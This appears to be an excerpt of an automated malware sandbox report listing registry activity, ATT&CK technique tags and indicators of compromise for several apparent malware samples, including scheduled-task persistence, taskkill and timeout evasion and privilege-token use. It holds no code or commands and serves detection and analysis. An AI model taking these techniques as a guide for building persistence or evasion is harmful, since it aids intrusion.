Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
64848	Process not Found
71512	Process not Found

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	311	Go-http-client/1.1
HTTP User-Agent header	505	Go-http-client/1.1

Kills process with taskkill 2 IoCs

defense_evasion

pid	Process
2692	Process not Found
23512	Process not Found

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-780313508-644878201-565826771-1000\{B7B100BF-1D22-4CDC-AE77-494A4DFCDF99}	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-780313508-644878201-565826771-1000\{CC787A7F-FC7F-421A-9116-767CC6B96BF5}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost_ = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23"	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost_ = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-780313508-644878201-565826771-1000\{35A6234B-E4B9-4AC4-8F01-CBE482867C38}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
65356	Process not Found

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1256	SCHTASKS.exe
49044	Process not Found
63348	Process not Found

Suspicious behavior: EnumeratesProcesses 57 IoCs

pid	Process
5912	1u87m9.exe
5912	1u87m9.exe
1156	rapes.exe
1156	rapes.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4208	2x8387.exe
4216	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
4216	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
5552	3r19R.exe
5552	3r19R.exe
5024	d19abfa281.exe
5024	d19abfa281.exe
5024	d19abfa281.exe
5024	d19abfa281.exe
5024	d19abfa281.exe
5024	d19abfa281.exe
5024	d19abfa281.exe
5024	d19abfa281.exe
4536	rapes.exe
4536	rapes.exe
2652	JqGBbm7.exe
2652	JqGBbm7.exe
404	powershell.exe
404	powershell.exe
3996	Bthvgkck.exe
3996	Bthvgkck.exe
3996	Bthvgkck.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
5660	v6Oqdnc.exe
4388	HmngBpR.exe
4388	HmngBpR.exe
2536	SplashWin.exe
6124	SplashWin.exe
6124	SplashWin.exe
6124	SplashWin.exe
4448	RegAsm.exe
4448	RegAsm.exe
5280	powershell.exe
5280	powershell.exe
4416	cmd.exe
4416	cmd.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
6124	SplashWin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeImpersonatePrivilege	4208	2x8387.exe
Token: SeImpersonatePrivilege	4208	2x8387.exe
Token: SeImpersonatePrivilege	5024	d19abfa281.exe
Token: SeImpersonatePrivilege	5024	d19abfa281.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeImpersonatePrivilege	5660	v6Oqdnc.exe
Token: SeImpersonatePrivilege	5660	v6Oqdnc.exe
Token: SeDebugPrivilege	4448	RegAsm.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeDebugPrivilege	5280	powershell.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1592	explorer.exe
Token: SeCreatePagefilePrivilege	1592	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1920	explorer.exe
Token: SeCreatePagefilePrivilege	1920	explorer.exe
Token: SeShutdownPrivilege	1784	explorer.exe
Token: SeCreatePagefilePrivilege	1784	explorer.exe
